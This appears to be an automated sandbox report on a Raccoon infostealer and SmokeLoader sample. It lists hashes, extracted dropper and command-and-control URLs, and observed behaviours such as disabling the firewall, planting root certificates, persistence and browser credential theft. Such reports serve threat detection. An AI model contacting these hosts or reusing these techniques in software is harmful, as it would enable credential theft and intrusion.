raccoon | 858a2b253b7e26188cffde5e58dfb08e4a26ef393f962958d6a1615c93f9917e

Analysis

max time kernel
150s
max time network
133s
platform
windows7_x64
resource
win7-en-20210920
submitted
26-09-2021 09:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

924b06fed5002d7dbc6004401b7a519f.exe
Size

145KB
MD5

924b06fed5002d7dbc6004401b7a519f
SHA1

669962749b03a129e44c6eec9ef2804ec31493f4
SHA256

858a2b253b7e26188cffde5e58dfb08e4a26ef393f962958d6a1615c93f9917e
SHA512

7b9e2c6765077ebe4e438e86f805792b02e18e2cc4519184c80db4a975db40dec9969a950451f1cdce95a0648f8ff2347fce619e8b40551319ee69e5f577b486

Score

10^/10

raccoon smokeloader 5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4 backdoor discovery evasion spyware stealer themida trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://dl.uploadgram.me/61502be7944fdh?raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://dl.uploadgram.me/614cdbc0954d0h?raw

Extracted

Family

smokeloader

Version

2020

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/

rc4.i32

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes

url4cnc
https://t.me/agrybirdsgamerept

rc4.plain

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

69 1436 powershell.exe
72 668 powershell.exe
Downloads MZ/PE file

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

flow	pid	process
69	1436	powershell.exe
72	668	powershell.exe

Executes dropped EXE 16 IoCs

Processes:

3552.exe3CB2.exe41A3.exe4481.exeZenar.exeMicrosoft_Edge.exeUpSys.exeUpSys.exeUpSys.exeJava.exeRuntimeBroker.exesvchost32.exeservices32.exeservice.exesvchost32.exesihost32.exe

pid	process
1660	3552.exe
756	3CB2.exe
1796	41A3.exe
1492	4481.exe
1484	Zenar.exe
572	Microsoft_Edge.exe
1560	UpSys.exe
560	UpSys.exe
860	UpSys.exe
608	Java.exe
1436	RuntimeBroker.exe
1260	svchost32.exe
1116	services32.exe
1924	service.exe
1648	svchost32.exe
884	sihost32.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Zenar.exe	upx
C:\Users\Admin\AppData\Local\Temp\Zenar.exe	upx
\Users\Admin\AppData\Local\Temp\Zenar.exe	upx
C:\Users\Admin\AppData\Local\Temp\Zenar.exe	upx
\ProgramData\MicrosoftNetwork\System.exe	upx

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3552.exe3CB2.exeMicrosoft_Edge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3552.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3552.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3CB2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3CB2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Microsoft_Edge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Microsoft_Edge.exe

Deletes itself 1 IoCs

Processes:

pid process

1336
Drops startup file 1 IoCs

Processes:

Zenar.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk Zenar.exe

pid	process
1336

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	Zenar.exe

Loads dropped DLL 12 IoCs

Processes:

3CB2.exeZenar.exepowershell.execmd.exepowershell.execmd.exesvchost32.execmd.exesvchost32.exe

pid	process
756	3CB2.exe
788
1484	Zenar.exe
1484	Zenar.exe
1484	Zenar.exe
1532	powershell.exe
1144	cmd.exe
1584	powershell.exe
1512	cmd.exe
1260	svchost32.exe
1668	cmd.exe
1648	svchost32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3552.exe	themida
behavioral1/memory/1660-62-0x00000000000C0000-0x00000000000C1000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\3CB2.exe	themida
behavioral1/memory/756-69-0x00000000010B0000-0x00000000010B1000-memory.dmp	themida
\ProgramData\Systemd\Microsoft_Edge.exe	themida
\ProgramData\Systemd\Microsoft_Edge.exe	themida
C:\ProgramData\Systemd\Microsoft_Edge.exe	themida
behavioral1/memory/572-125-0x0000000000400000-0x00000000011F4000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Microsoft_Edge.exe3552.exe3CB2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Microsoft_Edge.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3552.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3CB2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 8 IoCs

Processes:

powershell.exesvchost32.exesvchost32.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	svchost32.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.log	svchost32.exe
File created	C:\Windows\system32\services32.exe	svchost32.exe
File opened for modification	C:\Windows\system32\services32.exe	svchost32.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

3552.exe3CB2.exeMicrosoft_Edge.exe

pid process

1660 3552.exe
756 3CB2.exe
572 Microsoft_Edge.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

924b06fed5002d7dbc6004401b7a519f.exe4481.exeRuntimeBroker.exe

description	pid	process	target process
PID 1116 set thread context of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1492 set thread context of 1512	1492	4481.exe	RegSvcs.exe
PID 1436 set thread context of 1124	1436	RuntimeBroker.exe	RegSvcs.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20210926090207.cab schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20210926090207.cab	schtasks.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

924b06fed5002d7dbc6004401b7a519f.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	924b06fed5002d7dbc6004401b7a519f.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	924b06fed5002d7dbc6004401b7a519f.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	924b06fed5002d7dbc6004401b7a519f.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1260 schtasks.exe
1784 schtasks.exe
1920 schtasks.exe

pid	process
1260	schtasks.exe
1784	schtasks.exe
1920	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

UpSys.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	UpSys.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90bf492fb5b2d701	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Zenar.exesvchost32.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Zenar.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Zenar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	svchost32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	svchost32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Zenar.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Zenar.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Zenar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Zenar.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

924b06fed5002d7dbc6004401b7a519f.exe

pid	process
1128	924b06fed5002d7dbc6004401b7a519f.exe
1128	924b06fed5002d7dbc6004401b7a519f.exe
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336
1336

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1336
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

924b06fed5002d7dbc6004401b7a519f.exe

pid process

1128 924b06fed5002d7dbc6004401b7a519f.exe

pid	process
1336

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

3CB2.exe3552.exepowershell.exepowershell.exeUpSys.exeMicrosoft_Edge.exepowershell.exeUpSys.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost32.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost32.exe

description	pid	process
Token: SeShutdownPrivilege	1336
Token: SeShutdownPrivilege	1336
Token: SeShutdownPrivilege	1336
Token: SeShutdownPrivilege	1336
Token: SeDebugPrivilege	756	3CB2.exe
Token: SeDebugPrivilege	1660	3552.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeShutdownPrivilege	1336
Token: SeShutdownPrivilege	1336
Token: SeShutdownPrivilege	1336
Token: SeShutdownPrivilege	1336
Token: SeShutdownPrivilege	1336
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1560	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1560	UpSys.exe
Token: SeLockMemoryPrivilege	572	Microsoft_Edge.exe
Token: SeIncreaseQuotaPrivilege	1560	UpSys.exe
Token: 0	1560	UpSys.exe
Token: SeLockMemoryPrivilege	572	Microsoft_Edge.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	560	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	560	UpSys.exe
Token: SeIncreaseQuotaPrivilege	560	UpSys.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	984	powershell.exe
Token: SeDebugPrivilege	1260	svchost32.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	1648	svchost32.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

pid process

1336
1336
1336
1336
1336
1336
Suspicious use of SendNotifyMessage 8 IoCs

Processes:

pid process

1336
1336
1336
1336
1336
1336
1336
1336

pid	process
1336
1336
1336
1336
1336
1336

pid	process
1336
1336
1336
1336
1336
1336
1336
1336

Suspicious use of WriteProcessMemory 64 IoCs

